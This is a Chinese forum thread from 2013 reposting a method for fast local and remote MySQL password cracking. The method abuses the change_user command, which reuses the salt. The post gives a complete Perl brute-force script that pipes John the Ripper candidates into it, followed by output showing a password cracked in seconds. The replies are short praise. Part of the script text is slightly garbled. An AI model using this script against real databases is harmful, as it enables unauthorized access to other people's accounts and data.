查看: 3130|回复: 26

快速的 MySQL 本地和远程密码破解

[复制链接]
发表于 2013-1-8 09:43:38 | 显示全部楼层 |阅读模式

只看标题的浮躁用户请特别注意以下内容!!!

快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。

我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

方法如下:

攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。

是什么导致非常慢?

因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。

下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:

测试的用户是 crackme 密码为 pass,只需数秒就可破解。

(大约 20 秒钟可测试 10 万密码)

测试脚本如下:

01use Net::MySQL;

02

03$|=1;

04

05my $mysql = Net::MySQL->new(

06 hostname => '192.168.2.3',

07 database => 'test',

08 user     => "user",

09 password => "secret",

10 debug => 0,

11);

12

13$crackuser = "crackme";

14

15while(<stdin>) {

16chomp;

17$currentpass = $_;

18

19$vv = join "\0",

20        $crackuser,

21        "\x14".

22        Net::MySQL:assword->scramble(

23            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}

24        ) . "\0";

25if ($mysql->_execute_command("\x11", $vv) ne undef) {

26    print "
  • Cracked! --> $currentpass\n";

  • 27    exit;

    28}

    29}

    下面是我这台机器上的执行结果:

    C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo

    hn --incremental --stdout=5 | perl mysqlcrack.pl
    Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
    words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
    words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
    words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
    words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
    words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
    words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
    words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2

  • Cracked! --> pass
    words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs

    Session aborted

    祝你好运:)

    via grok





  • 发表于 2013-1-8 13:28:51 | 显示全部楼层
    很好!很强大!  
    发表于 2013-1-9 08:10:01 | 显示全部楼层
    真好。。。。。。。。。  
    发表于 2014-9-23 08:53:22 | 显示全部楼层
    呵呵,等着就等着....  
    发表于 2014-11-5 08:16:10 | 显示全部楼层
    先顶后看  
    发表于 2014-11-18 01:12:46 | 显示全部楼层
    接到陌生电话请先说,“你好,找哪位”  
    发表于 2014-12-5 12:56:58 | 显示全部楼层
    赚点分不容易啊  
    发表于 2014-12-28 21:00:03 | 显示全部楼层
    非常感谢楼主,楼主万岁万岁万万岁!  
    发表于 2015-1-28 15:49:00 | 显示全部楼层
    照你这么说真的有道理哦 呵呵 不进沙子馁~~~  
    发表于 2015-3-2 16:58:08 | 显示全部楼层
    顶也~  
    高级模式
    B Color Image Link Quote Code Smilies

    本版积分规则